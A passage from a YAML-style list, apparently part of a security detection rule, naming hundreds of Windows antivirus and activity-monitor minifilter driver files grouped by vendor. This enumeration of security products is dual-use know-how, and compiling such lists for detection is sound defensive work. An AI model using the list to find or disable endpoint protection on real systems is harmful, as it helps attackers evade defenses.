Ltd.\n - 'ggc.sys'\n - 'catflt.sys'\n # ReaQta Ltd.\n - 'reaqtor.sys'\n # refractionPOINT\n - 'hcp_kernel_acq.sys'\n # REVE Antivirus\n - 'ReveFltMgr.sys'\n - 'ReveProcProtection.sys'\n # S.N.Safe&Software\n - 'snscore.sys'\n # Sangfor Technologies\n - 'sfavflt.sys'\n # Savant Protection, Inc.\n - 'savant.sys'\n # Scargo Inc\n - 'si32_file.sys'\n - 'si64_file.sys'\n # SECUI Corporation\n - 'sciptflt.sys'\n - 'scifsflt.sys'\n # SecuLution GmbH\n - 'ssvhook.sys'\n # SecureAge Technology\n - 'sascan.sys'\n # SecureBrain Corporation\n - 'mscan-rt.sys'\n # SecureLink Inc.\n - 'zwPxeSvr.sys'\n - 'zwASatom.sys'\n # Securitas Technologies,Inc.\n - 'NovaShield.sys'\n # SecurityCoverage, Inc.\n - 'SCFltr.sys'\n # Segira LLC\n - 'SegiraFlt.sys'\n # Segurmatica\n - 'SegMD.sys'\n - 'SegMP.sys'\n - 'SegF.sys'\n # Sequretek IT\n - 'KawachFsMinifilter.sys'\n # SGA\n - 'EPSMn.sys'\n # SGRI Co., LTD.\n - 'vcMFilter.sys'\n # SheedSoft Ltd\n - 'SheedAntivirusFilterDriver.sys'\n # Shenzhen Tencent Computer Systems Company Limited\n - 'TSysCare.sys'\n - 'TFsFlt.sys'\n # Softwin\n - 'bdfsfltr.sys'\n - 'bdfm.sys'\n # Sophos\n - 'savonaccess.sys'\n - 'sld.sys'\n # SpellSecurity\n - 'spellmon.sys'\n # Sybonic Systems Inc\n - 'THFilter.sys'\n # symantec\n - 'eeCtrl.sys'\n - 'eraser.sys'\n - 'SRTSP.sys'\n - 'SRTSPIT.sys'\n - 'SRTSP64.SYS'\n # Symantec\n - 'VirtualAgent.sys'\n # Tall Emu\n - 'OADevice.sys'\n # Technology Nexus AB\n - 'SE46Filter.sys'\n # TEHTRI-Security\n - 'egambit.sys'\n # Tencent\n - 'TesMon.sys'\n - 'QQSysMonX64.sys'\n - 'QQSysMon.sys'\n # Teramind\n - 'tmfsdrv2.sys'\n # TRAPMINE A.S.\n - 'trpmnflt.sys'\n # Trend\n - 'tmpreflt.sys'\n # Trend Micro Inc.\n - 'TmKmSnsr.sys'\n - 'fileflt.sys'\n - 'TmEsFlt.sys'\n - 'TmEyes.sys'\n - 'tmevtmgr.sys'\n # Verdasys Inc\n - 'STKrnl64.sys'\n # VisionPower Co.,Ltd.\n - 'PZDrvXP.sys'\n # VMware, Inc.\n - 'vsepflt.sys'\n - 'VFileFilter.sys(renamed)'\n # WardWiz\n - 'WrdWizSecure64.sys'\n - 'wrdwizscanner.sys'\n # Webroot Inc.\n - 
'WRAEKernel.sys'\n - 'WRKrn.sys'\n - 'WRCore.sys'\n # Webroot Software, Inc.\n - 'ssfmonm.sys'\n # White Cloud Security\n - 'WCSDriver.sys'\n # WidgetNuri Corp\n - 'SoftFilterxxx.sys'\n - 'RansomDefensexxx.sys'\n # WINS CO. LTD\n - 'agentrtm64.sys'\n - 'rswmon.sys'\n # Yoggie\n - 'UFDFilter.sys'\n # ZhengYong InfoTech LTD.\n - 'Zyfm.sys'\n #\n # FSFilter Anti-Virus - END\n #\n #\n # FSFilter Activity Monitor - BEGIN\n #\n # (c)SMS\n - 'isafermon'\n # 1mill\n - 'FSMon.sys'\n # 360 Software (Beijing)\n - 'AtdrAgent.sys'\n - 'AtdrAgent64.sys'\n - 'Qutmdrv.sys'\n # Acronis\n - 'NgScan.sys'\n # Actifio Inc\n - 'aaf.sys'\n # Adaptiva\n - 'AdaptivaClientCache32.sys'\n - 'AdaptivaclientCache64.sys'\n # Adtrustmedia\n - 'browserMon.sys'\n # AhnLab, Inc.\n - 'VPDrvNt.sys'\n # AI Consulting\n - 'aictracedrv_am.sys'\n # Airlock Digital Pty Ltd\n - 'alcapture.sys'\n # AIRWare Technology Ltd\n - 'airship-filter.sys'\n # Alfa\n - 'AlfaFF.sys'\n # Aliaksander Lebiadzevich\n - 'SDDrvLdr.sys'\n # AlphaAntiLeak\n - 'AALProtect.sys'\n # ALPS SYSTEM INTERGRATION CO.\n - 'ISIRMFmon.sys'\n # Altaro Ltd.\n - 'altcbt.sys'\n # ALWIL Software\n - 'aswFsBlk.sys'\n # Amazon Web Services Inc\n - 'AmznMon.sys'\n # Analytik Jena AG\n - 'ajfsprot.sys'\n # ApexSQL LLC\n - 'ApexSqlFilterDriver.sys'\n # AppGuard LLC\n - 'AGSysLock.sys'\n - 'AGSecLock.sys'\n # AppiXoft\n - 'axfsysmon.sys'\n - 'scensemon.sys'\n # AppSense Ltd\n - 'DataNow_Driver.sys'\n - 'UcaFltDriver.sys'\n # AppStream, Inc.\n - 'rflog.sys'\n # ApSoft\n - 'CwMem2k64.sys'\n # Aqua Security\n - 'ContainerMonitor.sys'\n # Arcserve\n - 'xoiv8x64.sys'\n # Arkoon Network Security\n - 'heimdall.sys'\n # Ashampoo Development\n - 'IFS64.sys'\n # AsiaInfo Technologies\n - 'kFileFlt.sys'\n # Aternity Ltd\n - 'AternityRegistryHook.sys'\n # Atlansys Software\n - 'atflt.sys'\n - 'amfd.sys'\n # Avanite Limited\n - 'AvaPsFD.sys'\n # Avast Software\n - 'aswSP.sys'\n # AVG Technologies CZ\n - 'avgtpx86.sys'\n - 'avgtpx64.sys'\n # Avira GmbH\n - 
'avipbb.sys'\n # Axact Pvt Ltd\n - 'axfltdrv.sys'\n # Axur Information Sec.\n - 'amsfilter.sys'\n # Baidu (beijing)\n - 'BdRdFolder.sys'\n # Baidu (Hong Kong) Limited\n - 'Bfmon.sys'\n # Baidu Online Network\n - 'bdsysmon.sys'\n # Barkly Protects Inc.\n - 'BOsCmFlt.sys'\n - 'BOsFsFltr.sys'\n # BattlEye Innovations\n - 'BEDaisy.sys'\n # Beijing CA-JinChen Software Co.\n - 'kfac.sys'\n # Beijing QiAnXin Tech.\n - 'QmInspec.sys'\n # Beijing Qihoo Technology Co.\n - '360fsflt.sys'\n # Beijing Shu Yan Science\n - 'GagSecurity.sys'\n # Beijing Zhong Hang Jiaxin Computer Technology Co.,Ltd.\n - 'filefilter.sys'\n # Best Security\n - 'rpwatcher.sys'\n # BeyondTrust Inc.\n - 'BlackbirdFSA.sys'\n # BicDroid Inc.\n - 'QDocumentREF.sys'\n # Bit9 Inc.\n - 'CarbonBlackK.sys'\n # BitArmor Systems, Inc\n - 'bapfecpt.sys'\n - 'bamfltr.sys'\n # Bitdefender SRL\n - 'edrsensor.sys'\n - 'bdprivmon.sys'\n # bitFence Inc.\n - 'bfaccess.sys'\n # BiZone LLC\n - 'bzsenyaradrv.sys'\n - 'bzsenspdrv.sys'\n - 'bzsenth.sys'\n # Blue Ridge Networks\n - 'BrnFileLock.sys'\n - 'BrnSecLock.sys'\n # Bluzen Inc\n - 'ipcomfltr.sys'\n # Broadcom\n - 'symevnt.sys'\n - 'symevnt32.sys'\n # Bromium Inc\n - 'brfilter.sys'\n - 'BrCow_x_x_x_x.sys'\n - 'BemK.sys'\n # ByStorm\n - 'BssAudit.sys'\n # C-DAC Hyderabad\n - 'pecfilter.sys'\n # CA\n - 'xomfcbt8x64.sys'\n - 'KmxAgent.sys'\n - 'KmxFile.sys'\n - 'KmxSbx.sys'\n # Carbonite Inc\n - 'MozyNextFilter.sys'\n - 'MozyCorpFilter.sys'\n - 'MozyEntFilter.sys'\n - 'MozyOEMFilter.sys'\n - 'MozyEnterpriseFilter.sys'\n - 'MozyProFilter.sys'\n - 'MozyHomeFilter.sys'\n - 'BDSFilter.sys'\n - 'CSBFilter.sys'\n # cEncrypt\n - 'dsflt.sys'\n # Centennial Software Ltd\n - 'msiodrv4.sys'\n # Centre for Development of Advanced Computing\n - 'USBPDH.SYS'\n # Centrify Corp\n - 'CentrifyFSF.sys'\n # Certero\n - 'cmflt.sys'\n # Chaewool\n - 'cFSfdrv'\n # Check Point Software\n - 'epregflt.sys'\n - 'epklib.sys'\n # Checkpoint Software\n - 'cpepmon.sys'\n # ChemoMetec\n - 
'ChemometecFilter.sys'\n # Cigent Technology Inc\n - 'Spotlight.sys'\n # Cigital, Inc.\n - 'fmdrive.sys'\n # Cisco Systems\n - 'csaam.sys'\n # Citrix Systems\n - 'srminifilterdrv.sys'\n # Clonix Co\n - 'rsfdrv.sys'\n # Clumio Inc\n - 'ClumioChangeBlockMf.sys'\n # Code42\n - 'Code42Filter.sys'\n # ColorTokens\n - 'FFDriver.sys'\n # Comae Tech\n - 'windd.sys'\n # CommVault Systems, Inc.\n - 'CVCBT.sys'\n # Comodo Security Solutions Inc.\n - 'CmdCwagt.sys'\n - 'cfrmd.sys'\n # ComTrade\n - 'ctamflt.sys'\n # Comtrue Technology\n - 'shdlpSf.sys'\n - 'ctrPAMon.sys'\n - 'shdlpMedia.sys'\n # Conduant Corporation\n - 'ConduantFSFltr.sys'\n # Condusiv Technologies\n - 'hiofs.sys'\n # CondusivTechnologies\n - 'vintmfs.sys'\n - 'intmfs.sys'\n - 'excfs.sys'\n # Confio\n - 'IridiumSwitch.sys'\n # CONNECT SHIFT LTD\n - 'DTPL.sys'\n # Crawler Group\n - 'tbrdrv.sys'\n # Credant Technologies\n - 'XendowFLT.sys'\n # CristaLink\n - 'mtsvcdf.sys'\n # CRU Data Security Group\n - 'CdsgFsFilter.sys'\n # CyberArk Software\n - 'vfpd.sys'\n - 'CybKernelTracker.sys'\n # CyberSight Inc\n - 'csmon.sys'\n # Cygna Labs\n - 'FileMonitor.sys'\n # Cylance Inc.\n - 'CyOptics.sys'\n - 'CyProtectDrv32.sys'\n - 'CyProtectDrv64.sys'\n # Cytrence Inc\n - 'cytmon.sys'\n # Datacloak Tech\n - 'dcfsgrd.sys'\n # DataGravity Inc.\n - 'dgfilter.sys'\n # Datto Inc\n - 'DattoFSF.sys'\n # Dell Secureworks\n - 'groundling32.sys'\n - 'groundling64.sys'\n # Dell Software Inc.\n - 'DgeDriver.sys'\n # DELL Technologies\n - 'DTDSel.sys'\n # Dell Technologies\n - 'NWEDriver.sys'\n # derivo GmbH\n - 'bbfilter.sys'\n # Digitalsense Co\n - 'dsfltfs.sys'\n # Diskeeper Corporation\n - 'nowonmf.sys'\n - 'dktlfsmf.sys'\n - 'DKDrv.sys'\n - 'DKRtWrt.sys'\n - 'HBFSFltr.sys'\n # Dmitry Stefankov\n - 'WinTeonMiniFilter.sys'\n - 'wiper.sys'\n - 'DevMonMiniFilter.sys'\n # Doctor Web\n - 'Drwebfwflt.sys'\n - 'EventMon.sys'\n # Douzone Bizon Co\n - 'rswctrl.sys'\n - 'mcstrg.sys'\n - 'fmkkc.sys'\n - 'nmlhssrv01.sys'\n # DreamCrafts\n - 
'SaMFlt.sys'\n # Dtex Systems\n - 'dnaFSMonitor.sys'\n # EaseVault Technologies Inc.\n - 'EaseFlt.sys'\n # Egis Technology Inc.\n - 'eLock2FSCTLDriver.sys'\n # eIQnetworks Inc.\n - 'FIM.sys'\n # Elex Tech Inc\n - 'iSafeKrnl.sys'\n - 'iSafeKrnlMon.sys'\n # eMingSoftware Inc\n - 'NetPeeker.sys'\n # Encourage Technologies\n - 'asiofms.sys'\n # Enterprise Data Solutions, Inc.\n - 'edsigk.sys'\n # Entrust Inc.\n - 'eetd32.sys'\n - 'eetd64.sys'\n # ESET, spol. s r.o.\n - 'ehdrv.sys'\n # ESTsoft corp.\n - 'EstPrmon.sys'\n - 'Estprp.sys'\n - 'EstRegmon.sys'\n - 'EstRegp.sys'\n # F-Secure\n - 'fshs.sys'\n - 'fsatp.sys'\n # Faronics Corporation\n - 'AeFilter.sys'\n # FastTrack Software ApS\n - 'AbrPmon.sys'\n # FFC Limited\n - 'FFCFILT.SYS'\n # FileTek, Inc.\n - 'TrustedEdgeFfd.sys'\n # FireEye Inc\n - 'WFP_MRT.sys'\n # FireEye Inc.\n - 'FeKern.sys'\n # Fitsec Ltd\n - 'kconv.sys'\n - 'trace.sys'\n - 'SandDriver.sys'\n # Flexera Software Inc.\n - 'ISRegFlt.sys'\n - 'ISRegFlt64.sys'\n # ForcePoint LLC.\n - 'fpepflt.sys'\n # Fujian Shen Kong\n - 'wats_se.sys'\n # FUJITSU ENGINEERING\n - 'ibr2fsk.sys'\n # FUJITSU LIMITED\n - 'FJGSDis2.sys'\n - 'FJSeparettiFilterRedirect.sys'\n - 'Fsw31rj1.sys'\n - 'da_ctl.sys'\n # FUJITSU SOCIAL SCIENCE\n - 'secure_os.sys'\n # FUJITSU SOFTWARE\n - 'PsAcFileAccessFilter.sys'\n # Fusion-io\n - 'fiometer.sys'\n - 'dcSnapRestore.sys'\n # Futuresoft\n - 'PointGuardVistaR32.sys'\n - 'PointGuardVistaR64.sys'\n - 'PointGuardVistaF.sys'\n - 'PointGuardVista64F.sys'\n # G Data Software AG\n - 'gddcv.sys'\n # GameHi Co.\n - 'Codex.sys'\n # GemacmbH\n - 'GcfFilter.sys'\n # Glarysoft Ltd.\n - 'GUMHFilter.sys'\n # Google, Inc.\n - 'MRxGoogle.sys'\n # Gorizonty Rosta Ltd\n - 'GoFSMF.sys'\n # GrammaTech, Inc.\n - 'drvhookcsmf.sys'\n - 'drvhookcsmf_amd64.sys'\n # Group-IB LTD\n - 'gibepcore.sys'\n # HA Unix Pt\n - 'hafsnk.sys'\n # Hangzhou Yifangyun\n - 'fangcloud_autolock_driver.sys'\n # HAURI\n - 'secure_os_mf.sys'\n # Hauri Inc\n - 'VrVBRFsFilter.sys'\n - 
'VrExpDrv.sys'\n # HAVELSAN A.\n - 'HVLMinifilter.sys'\n # HEAT Software\n - 'SK.sys'\n # Heilig Defense LLC\n - 'HDRansomOffDrv.sys'\n - 'HDCorrelateFDrv.sys'\n - 'HDFileMon.sys'\n # Hexis Cyber Solutions\n - 'HexisFSMonitor.sys'\n # HFN Inc.\n - 'RGNT.sys'\n # Hitachi Solutions\n - 'hsmltmon.sys'\n # Honeycomb Technologies\n - 'dskmn.sys'\n # HP\n - 'hpreg.sys'\n # i-Guard SAS\n - 'iGuard.sys'\n # I-O DATA DEVICE\n - 'sConnect.sys'\n # IBM\n - 'NmpFilter.sys'\n - 'FsMonitor.sys'\n # Idera\n - 'IderaFilterDriver.sys'\n # Idera Software\n - 'SQLsafeFilterDriver.sys'\n # IGLOO SECURITY, Inc.\n - 'kmNWCH.sys'\n # IKARUS Security\n - 'Sonar.sys'\n # Immidio B.V.\n - 'immflex.sys'\n # in-soft Kft.\n - 'LmDriver.sys'\n # INCA Internet Co.\n - 'GKPFCB.sys'\n - 'GKPFCB64.sys'\n # INCA Internet Co.,Ltd.\n - 'TkPcFtCb.sys'\n - 'TkPcFtCb64.sys'\n # Industrial Technology\n - 'icrlmonitor.sys'\n # InfoCage\n - 'IccFilterSc.sys'\n # Informzaschita\n - 'SnDacs.sys'\n - 'SnExequota.sys'\n # Infotecs\n - 'filenamevalidator.sys'\n - 'KC3.sys'\n # InfoWatch\n - 'iwhlp2.sys'\n - 'iwhlpxp.sys'\n - 'iwhlp.sys'\n - 'iwdmfs.sys'\n # Initech Inc.\n - 'INISBDrv64.sys'\n # Int3 Software AB\n - 'equ8_helper.sys'\n # Intel Corporation\n - 'ielcp.sys'\n - 'IESlp.sys'\n - 'IntelCAS.sys'\n # Intercom Inc.\n - 'tsifilemon.sys'\n - 'MarSpy.sys'\n # Interset Inc.\n - 'WDCFilter.sys'\n # Intronis Inc\n - 'VHDTrack.sys'\n # Invincea\n - 'InvProtectDrv.sys'\n - 'InvProtectDrv64.sys'\n # Ionx Solutions LLP\n - 'AuditFlt.sys'\n # ioScience\n - 'iothorfs.sys'\n # iSecure Ltd.\n - 'isecureflt.sys'\n # ITsMine\n - 'imfilter.sys'\n # ITSTATION Inc\n - 'aUpDrv.sys'\n # Ivanti\n - 'IvAppMon.sys'\n # J's Communication Co.\n - 'RevoNetDriver.sys'\n # Jinfengshuntai\n - 'IPFilter.sys'\n # JiranData Co. 
Ltd\n - 'JDPPWF.sys'\n - 'JDPPSF.sys'\n # Jiransoft Co., Ltd\n - 'offsm.sys'\n - 'xkfsfd.sys'\n - 'JKPPOB.sys'\n - 'JKPPXK.sys'\n - 'JKPPPF.sys'\n - 'JKPPOK.sys'\n - 'pcpifd.sys'\n # k4solution Co.\n - 'zsfprt.sys'\n # Kalpataru\n - 'GPMiniFIlter.sys'\n # Kaspersky Lab\n - 'klboot.sys'\n - 'klfdefsf.sys'\n - 'klrsps.sys'\n - 'klsnsr.sys'\n - 'klifks.sys'\n - 'klifaa.sys'\n - 'Klifsm.sys'\n # KEBA AG\n - 'KeWF.sys'\n # Kenubi\n - 'boxifier.sys'\n # Keysight Technologies\n - 'KtFSFilter.sys'\n # kingsoft\n - 'Kisknl.sys'\n # KnowledgeTree Inc.\n - 'ktsyncfsflt.sys'\n # Koby Kahane\n - 'NpEtw.sys'\n # Ladislav Zezula\n - 'MSpy.sys'\n # LANDESK Software\n - 'LDSecDrv.sys'\n # Lenovo Beijing\n - 'slb_guard.sys'\n - 'lrtp.sys'\n # LINK co.\n - 'NetAccCtrl.sys'\n - 'NetAccCtrl64.sys'\n # Livedrive Internet Ltd\n - 'LivedriveFilter.sys'\n # Logichron Inc\n - 'CatMF.sys'\n # LogRhythm Inc.\n - 'LRAgentMF.sys'\n # Lovelace Network Tech\n - 'MPKernel.sys'\n # Lumension\n - 'eps.sys'\n # Magic Softworks, Inc.\n - 'MagicBackupMonitor.sys'\n # magrasoft Ltd\n - 'zqFilter.sys'\n # MailRu\n - 'mracdrv.sys'\n # Malwarebytes\n - 'mbamshuriken.sys'\n # Man Technology Inc\n - 'bsrfsflt.sys'\n - 'fsrfilter.sys'\n - 'vollock.sys'\n - 'drbdlock.sys'\n # ManageEngine Zoho\n - 'DFMFilter.sys'\n - 'DCFAFilter.sys'\n - 'RMPHVMonitor.sys'\n - 'FAPMonitor.sys'\n - 'MEARWFltDriver.sys'\n # ManTech\n - 'topdogfsfilt.sys'\n # March Hare Software Ltd\n - 'evscase.sys'\n - 'inuse.sys'\n - 'cvsflt.sys'\n # McAfee\n - 'mfencfilter.sys'\n # McAfee Inc.\n - 'mfeaskm.sys'\n # Micro Focus\n - 'FilrDriver.sys'\n # Microsoft\n - 'DhWatchdog.sys'\n - 'mssecflt.sys'\n - 'Backupreader.sys'\n - 'MsixPackagingToolMonitor.sys'\n - 'AppVMon.sys'\n - 'DpmFilter.sys'\n - 'Procmon11.sys'\n - 'minispy.sys'\n - 'fdrtrace.sys'\n - 'filetrace.sys'\n - 'uwfreg.sys'\n - 'uwfs.sys'\n - 'locksmith.sys'\n - 'winload.sys'\n - 'CbSampleDrv.sys'\n - 'simrep.sys'\n - 'change.sys'\n - 'delete_flt.sys'\n - 'SmbResilFilter.sys'\n - 
'usbtest.sys'\n - 'NameChanger.sys'\n - 'failMount.sys'\n - 'failAttach.sys'\n - 'stest.sys'\n - 'cdo.sys'\n - 'ctx.sys'\n - 'fmm.sys'\n - 'cancelSafe.sys'\n - 'message.sys'\n - 'passThrough.sys'\n - 'nullFilter.sys'\n - 'ntest.sys'\n - 'iiscache.sys'\n - 'wrpfv.sys'\n - 'msnfsflt.sys'\n # MRY Inc.\n - 'drsfile.sys'\n # NanJing Geomarking\n - 'MagicProtect.sys'\n - 'cbfsfilter2020.sys'\n # NEC Corporation\n - 'UVMCIFSF.sys'\n # NEC Soft\n - 'flyfs.sys'\n - 'serfs.sys'\n - 'hdrfs.sys'\n # NEC System Technologies\n - 'IccFilterAudit.sys'\n # NEC System Technologies,Ltd.\n - 'ICFClientFlt.sys'\n - 'IccFileIoAd.sys'\n # Neowiz Corporation\n - 'MWatcher.sys'\n # NetIQ\n - 'CGWMF.sys'\n # NetLib\n - 'nlcbhelpx86.sys'\n - 'nlcbhelpx64.sys'\n - 'nlcbhelpi64.sys'\n # NetVision, Inc.\n - 'nvmon.sys'\n # Network Appliance\n - 'flashaccelfs.sys'\n - 'changelog.sys'\n # NetworkProfi Ltd\n - 'laFS.sys'\n # New Net Technologies Limited\n - 'NNTInfo.sys'\n # NewSoftwares.net,Inc.\n - 'WinFLAHdrv.sys'\n - 'WinFLAdrv.sys'\n - 'WinDBdrv.sys'\n - 'WinFLdrv.sys'\n - 'WinFPdrv.sys'\n # NEXON KOREA\n - 'BlackCat.sys'\n # NextLabs\n - 'nxrmflt.sys'\n # Niriva LLC\n - 'VHDDelta.sys'\n - 'FSTrace.sys'\n # Novell\n - 'zesfsmf.sys'\n # NTP Software\n - 'ntps_fa.sys'\n # Nurd Yazilim A.S.\n - 'edrdrv.sys'\n # NURILAB\n - 'pfracdrv.sys'\n - 'nrcomgrdki.sys'\n - 'nrcomgrdka.sys'\n - 'nrpmonki.sys'\n - 'nrpmonka.sys'\n - 'nravwka.sys'\n - 'bhkavki.sys'\n - 'bhkavka.sys'\n - 'docvmonk.sys'\n - 'docvmonk64.sys'\n # NVELO Inc.\n - 'SamsungRapidFSFltr.sys'\n # OCZ Storage\n - 'OczMiniFilter.sys'\n # OnGuard Systems LLC\n - 'NlxFF.sys'\n # OpenText Corp\n - 'enmon.sys'\n # OPSWAT Inc.\n - 'libwamf.sys'\n # ORANGE WERKS Inc\n - 'wgfile.sys'\n # PA File Sight\n - 'FileSightMF.sys'\n # Packeteer\n - 'mblmon.sys'\n # Palo Alto Networks\n - 'tedrdrv.sys'\n # PHD Virtual Tech Inc.\n - 'phdcbtdrv.sys'\n # PJSC KP VTI\n - 'RW7FsFlt.sys'\n # PolyLogyx LLC\n - 'vast.sys'\n # Positive Technologies\n - 
'mpxmon.sys'\n # Protected Networks\n - 'minitrc.sys'\n # Qihoo 360\n - '360box.sys'\n # Qingdao Ruanmei Network Technology Co.\n - 'RMDiskMon.sys'\n - 'diskactmon.sys'\n # Quality Corporation\n - 'qfmon.sys'\n # Qualys Inc.\n - 'QMON.sys'\n - 'qfimdvr.sys'\n # Quantum Corporation.\n - 'cvofflineFlt32.sys'\n - 'cvofflineFlt64.sys'\n # Quest Software\n - 'QFAPFlt.sys'\n # Quest Software Inc.\n - 'BWFSDrv.sys'\n - 'CAADFlt.sys'\n # Quick Heal Technologies Pvt. Ltd.\n - 'sieflt.sys'\n - 'cssdlp.sys'\n - 'fam.sys'\n # Quorum Labs\n - 'qfilter.sys'\n # Rackware\n - 'rwchangedrv.sys'\n # Redstor Limited\n - 'RsFlt.sys'\n # RES Software\n - 'FileGuard.sys'\n - 'NetGuard.sys'\n - 'RegGuard.sys'\n - 'ImgGuard.sys'\n - 'AppGuard.sys'\n # Resplendence Software Projects\n - 'mmPsy32.sys'\n - 'mmPsy64.sys'\n - 'rrMon32.sys'\n - 'rrMon64.sys'\n # rhipe Australia Pty\n - 'SeRdr.sys'\n # Rubrik Inc\n - 'RubrikFileAudit.sys'\n - 'FileSystemCBT.sys'\n # rubysoft\n - 'IronGateFD.sys'\n # RuiGuard Ltd\n - 'RuiMinispy.sys'\n - 'RuiFileAccess.sys'\n - 'RuiEye.sys'\n - 'RuiMachine.sys'\n - 'RuiDiskFs.sys'\n # RUNEXY\n - 'ruaff.sys'\n - 'mlsaff.sys'\n # SAFE-Cyberdefense\n - 'SAFE-Agent.sys'\n # Safend\n - 'Sahara.sys'\n - 'Santa.sys'\n # SaferZone Co.\n - 'SZEDRDrv.sys'\n - 'szardrv.sys'\n - 'szpcmdrv.sys'\n - 'szdfmdrv.sys'\n - 'szdfmdrv_usb.sys'\n - 'sprtdrv.sys'\n # Samsung SDS Ltd\n - 'SGResFlt.sys'\n # SanDisk Inc.\n - 'fiopolicyfilter.sys'\n # Sandoll Communication\n - 'SfdFilter.sys'\n # SC ODEKIN SOLUTIONS SRL\n - 'ospmon.sys'\n # Scalable Software Inc.\n - 'PkgFilter.sys'\n # ScriptLogic\n - 'FSAFilter.sys'\n # Secdo\n - 'SecdoDriver.sys'\n # SecureAxis\n - 'usbl_ifsfltr.sys'\n # SecureAxis Software\n - 'llfilter.sys'\n # Secured Globe Inc.\n - 'fltRs329.sys'\n # Security Code LLC\n - 'ScAuthFSFlt.sys'\n - 'ScAuthIoDrv.sys'\n # SentinelOne\n - 'SentinelMonitor.sys'\n # Sevtechnotrans\n - 'uamflt.sys'\n # Shanghai YiCun Network Tech Co. 
Ltd\n - 'AccessValidator.sys'\n # SharpCrafters\n - 'psisolator.sys'\n # SheedSoft Ltd\n - 'SheedSelfProtection.sys'\n # SheedSoft Ltd.\n - 'arta.sys'\n # Shenzhen CloudRiver\n - 'CrUnCopy.sys'\n # SHENZHEN UNNOO Information Techco.\n - 'RyGuard.sys'\n - 'FileShareMon.sys'\n - 'ryfilter.sys'\n # Shenzhen Unnoo LTD\n - 'secufile.sys'\n - 'XiaobaiFs.sys'\n - 'XiaobaiFsR.sys'\n # ShinNihonSystec Co\n - 'sagntflt.sys'\n # Simopro Technology\n - 'CbFltFs4.sys'\n # SK Infosec Co\n - 'PLPOffDrv.sys'\n - 'ISFPDrv.sys'\n - 'ionmonwdrv.sys'\n # Sky Co., LTD.\n - 'SkyRGDrv.sys'\n - 'SkyAMDrv.sys'\n # Sky Co.,Ltd.\n - 'SkyWPDrv.sys'\n # SmartFile LLC\n - 'FileHubAgent.sys'\n # SMTechnology Co.\n - 'storagedrv.sys'\n # SN Systems Ltd\n - 'cbfilter20.sys'\n - 'cbfsfilter2017.sys'\n # SnoopWall LLC\n - 'SWCommFltr.sys'\n # SODATSW\n - 'sodatpfl.sys'\n - 'fcontrol.sys'\n # SoftCamp Co.\n - 'scred.sys'\n # Softnext Technologies\n - 'snimg.sys'\n # SoftPerfect Research\n - 'fsnk.sys'\n # Software Pursuits Inc.\n - 'SPIMiniFilter.sys'\n # Sogou Ltd.\n - 'SCAegis.sys'\n # Solarwinds LLC\n - 'SWFsFltrv2.sys'\n - 'SWFsFltr.sys'\n # Soliton Systems\n - 'it2reg.sys'\n - 'it2drv.sys'\n - 'solitkm.sys'\n # Soliton Systems K.K.\n - 'SDVFilter.sys'\n # Solusseum Inc\n - 'Sefo.sys'\n # Soluto LTD\n - 'PDGenFam.sys'\n # Somma Inc\n - 'MonsterK.sys'\n # SonicWall Inc\n - 'SFPMonitor.sys'\n # Sophos\n - 'SophosED.sys'\n # Sophos Plc\n - 'soidriver.sys'\n # SoulFrost\n - 'sfac.sys'\n # SPEKNET EOOD\n - 'Asgard.sys'\n # Spharsoft Technologies\n - 'SvCBT.sys'\n # Squadra Technologies\n - 'secRMM.sys'\n # Stegosystems Inc\n - 'StegoProtect.sys'\n # StorageCraft Tech\n - 'stcvsm.sys'\n # Stormshield\n - 'EsProbe.sys'\n # Sumitomo Electric Ltd.\n - 'MCFileMon64.sys'\n - 'MCFileMon32.sys'\n # Sun&Moon Rise\n - 'ntfsf.sys'\n # Symantec\n - 'pgpwdefs.sys'\n - 'GEProtection.sys'\n - 'sysMon.sys'\n - 'ssrfsf.sys'\n - 'emxdrv2.sys'\n - 'reghook.sys'\n - 'spbbcdrv.sys'\n - 'bhdrvx86.sys'\n - 'bhdrvx64.sys'\n 
- 'SISIPSFileFilter'\n - 'symevent.sys'\n # Symantec Corp.\n - 'diflt.sys'\n # Syncopate\n - 'thetta.sys'\n # Systemneeds, Inc\n - 'Snilog.sys'\n # TaaSera Inc.\n - 'AwareCore.sys'\n # Tanium\n - 'TaniumRecorderDrv.sys'\n # TCXA Ltd.\n - 'fcnotify.sys'\n # Tech Research\n - 'FASDriver'\n # TechnoKom Ltd.\n - 'agfsmon.sys'\n # Telefnica Digital\n - 'path8flt.sys'\n # Temasoft S.R.L.\n - 'filemon.sys'\n # Tencent (Shenzhen)\n - 'QQProtect.sys'\n - 'QQProtectX64.sys'\n # Tencent Technology\n - 'TenRSafe2.sys'\n - 'tesxporter.sys'\n - 'tesxnginx.sys'\n # Tetraglyph Technologies\n - 'TGFSMF.sys'\n # ThinAir Labs Inc\n - 'taobserveflt.sys'\n # ThinScale Tech\n - 'TSTFsReDir.sys'\n - 'TSTRegReDir.sys'\n - 'TSTFilter.sys'\n # Third Brigade\n - 'tbfsfilt.sys'\n # Threat Stack\n - 'ThreatStackFIM.sys'\n # Tiversa Inc\n - 'tss.sys'\n # Topology Ltd\n - 'dsfemon.sys'\n # Tranxition Corp\n - 'regmonex.sys'\n - 'TXRegMon.sys'\n # Trend Micro Inc.\n - 'TMUMS.sys'\n - 'hfileflt.sys'\n - 'TMUMH.sys'\n # Trend Micro, Inc.\n - 'AcDriver.sys'\n - 'SakFile.sys'\n - 'SakMFile.sys'\n # Tritium Inc.\n - 'Tritiumfltr.sys'\n # Trustware Ltd\n - 'Redlight.sys'\n # Trustwave\n - 'TWBDCFilter.sys'\n # UpGuard\n - 'UpGuardRealTime.sys'\n # Varlook Ltd.\n - 'varpffmon.sys'\n # Varonis Ltd\n - 'VrnsFilter.sys'\n # Veramine Inc\n - 'phantomd.sys'\n # Vidder Inc.\n - 'vidderfs.sys'\n # Viewfinity\n - 'vfdrv.sys'\n # Vision Solutions\n - 'repdrv.sys'\n - 'repmon.sys'\n # VMware, Inc.\n - 'VMWVvpfsd.sys'\n - 'RTOLogon.sys'\n # VoodooSoft\n - 'VSScanner.sys'\n # WaikatoLink Ltd\n - 'proggerdriver.sys'\n # WardWiz\n - 'WRDWIZFILEPROT.SYS'\n - 'WRDWIZREGPROT.SYS'\n # Warp Disk Software\n - 'DsDriver.sys'\n # Weing Co.,Ltd.\n - 'pscff.sys'\n # Wellbia.com\n - 'xhunter64.sys'\n - 'uncheater.sys'\n # Wellbiacom\n - 'xhunter1.sys'\n # Whitebox Security\n - 'wbfilter.sys'\n # WhiteCell Software Inc.\n - 'EGMinFlt.sys'\n # WidgetNuri Corp\n - 'wsafefilter.sys'\n - 'RansomDetect.sys'\n # Winicssec Ltd\n - 
